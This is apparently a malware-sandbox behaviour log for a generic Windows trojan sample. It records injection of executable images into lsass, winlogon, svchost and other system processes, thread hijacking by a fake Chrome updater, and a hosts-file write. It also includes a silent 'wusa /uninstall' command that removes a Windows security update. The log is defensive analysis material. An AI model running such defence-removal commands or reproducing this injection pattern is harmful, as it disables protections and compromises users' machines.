Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CA30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140AE890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DE1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CA60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 254A27A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: EC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DBFA540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FB7310000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: 87A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28AF9060000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26106120000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 19D48690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 1A4AA0F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2BEEB870000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AEF8F80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 25B826F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 12107F90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1B210E80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 28708E30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe | Memory written: PID: 1028 base: 87A0000 value: 4D
Source: C:\Windows\SysWOW64\system64x.exe | Thread register set: target process: 3876
Source: C:\ProgramData\Google\Chrome\updater.exe | Thread register set: target process: 7672
Source: C:\ProgramData\Google\Chrome\updater.exe | Thread register set: target process: 7728
Source: C:\ProgramData\Google\Chrome\updater.exe | Thread register set: target process: 7780
Source: C:\Windows\SysWOW64\system64x.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DD590000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CA30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\lsass.exe base: 140AE890000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195DE1A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dwm.exe base: 1160CA60000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 257E1070000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 254A27A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A205670000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 26238950000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2786E560000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1B279570000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22D13110000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C782530000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\spoolsv.exe base: EC0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 2A142790000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1428DCF0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DBFA540000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 23FB7310000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 25177B50000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 20859990000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\explorer.exe base: 87A0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 175C5280000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8E0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28AF9060000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 27234C50000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 28543540000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26106120000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 19D48690000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\conhost.exe base: 1A4AA0F0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2BEEB870000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AEF8F80000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\dllhost.exe base: 25B826F0000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\svchost.exe base: 12107F90000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1B210E80000
Source: C:\Windows\System32\dialer.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 28708E30000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Process created: C:\Windows\SysWOW64\system64x.exe "C:\Windows\SysWOW64\system64x.exe"
Source: C:\Windows\SysWOW64\system64x.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\dialer.exe | Code function: 17_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,17_2_0000000140001B54
Source: winlogon.exe, 00000016.00000000.2408863317.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3606414486.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000021.00000002.3622373759.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: winlogon.exe, 00000016.00000000.2408863317.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3606414486.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000021.00000002.3622373759.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000016.00000000.2408863317.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3606414486.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000021.00000002.3622373759.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: winlogon.exe, 00000016.00000000.2408863317.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3606414486.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000021.00000002.3622373759.0000011605EC1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\winlogon.exe | Code function: 22_2_000001E8589636F0 cpuid 22_2_000001E8589636F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
